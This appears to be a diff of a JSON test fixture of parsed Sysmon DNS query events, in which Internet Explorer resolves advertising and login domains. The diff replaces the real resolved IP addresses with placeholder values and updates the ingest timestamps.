ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2600,39 +2580,39 @@ }, "answers": [ { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2640,7 +2620,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2648,24 +2628,24 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -2680,25 +2660,18 @@ "nym1-ib.adnxs.com" ], "ip": [ - "68.67.178.252", - "68.67.179.11", - "68.67.179.228", - "68.67.178.184", - "204.13.192.141", - "68.67.180.43", - "68.67.179.23", - "68.67.179.197", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313772374Z", + "ingested": "2021-12-09T13:49:44.739207800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2766,52 +2739,52 @@ "type": "CNAME" }, { - "data": "34.196.86.129", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.250.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.244.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.224.204.11", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.237.44.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.231.21", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.172.198.255", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.186.227", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -2828,21 +2801,14 @@ "eb2.3lift.com" ], "ip": [ - "34.196.86.129", - "34.233.250.110", - "18.209.244.108", - "34.224.204.11", - "34.237.44.255", - "3.210.231.21", - "54.172.198.255", - "34.199.186.227", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313773584Z", + "ingested": "2021-12-09T13:49:44.739211500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2917,11 +2883,11 @@ "type": "CNAME" }, { - "data": "108.174.10.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -2929,7 +2895,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -2937,7 +2903,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -2945,7 +2911,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -2953,21 +2919,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -2984,22 +2950,22 @@ "px.ads.linkedin.com" ], "ip": [ - "108.174.10.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313775256Z", + "ingested": "2021-12-09T13:49:44.739216300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3067,22 +3033,22 @@ "type": "CNAME" }, { - "data": "40.90.23.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.154", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -3099,15 +3065,13 @@ "login.live.com" ], "ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313776561Z", + "ingested": "2021-12-09T13:49:44.739221100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3174,11 +3138,11 @@ }, "answers": [ { - "data": "74.119.119.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3186,7 +3150,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -3194,7 +3158,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -3202,7 +3166,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -3210,7 +3174,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -3218,23 +3182,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -3249,24 +3213,24 @@ "dis.criteo.com" ], "ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313778040Z", + "ingested": "2021-12-09T13:49:44.739226200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData 